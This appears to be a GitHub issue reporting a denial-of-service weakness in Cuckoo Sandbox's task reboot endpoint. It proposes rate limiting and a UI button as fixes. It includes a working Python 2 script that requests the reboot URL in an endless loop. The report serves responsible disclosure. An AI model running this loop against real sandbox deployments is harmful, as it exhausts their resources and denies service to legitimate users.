Hi Everyone,

I found a problem related to security (the availability of resources): when you restart a task, you can automate this operation in order to carry out a DoS attack with a simple Python script, and this remains valid even for the Cuckoo API.

The attacker performs a legitimate operation provided by the Cuckoo Sandbox: he requests the URL "http://192.168.42.14:8000/analysis/350/reboot/" via a simple call to the Python_request library, in an infinite loop.

Here is the script that can be used for said attack:

```python
# Python 2 script (urllib2 / base64.encodestring).
import urllib2, base64

# Reboot URL of the target analysis; requesting it over and over keeps the
# sandbox busy restarting task 350.
url = "http://192.168.42.14:8000/analysis/350/reboot/"

# HTTP Basic credentials (empty username and password in this example).
base64string = base64.encodestring('%s:%s' % ('', '')).replace('\n', '')

# Infinite loop: the request is sent without ever stopping.
while True:
    request = urllib2.Request(url)
    request.add_header("Authorization", "Basic %s" % base64string)
    result = urllib2.urlopen(request)
```

Solutions offered:

- Add a button to restart a task, instead of restarting the task from the URL (like deleting a task);
- Use the Python Ratelimit / Django-Ratelimit libraries, which provide a decorator to rate-limit views. Limiting can be based on IP address or a field in the request, either a GET or POST variable (limiting the number of requests per second).

Thank you. Best regards, nadir. @jbremer, @botherder, @jekil, @rep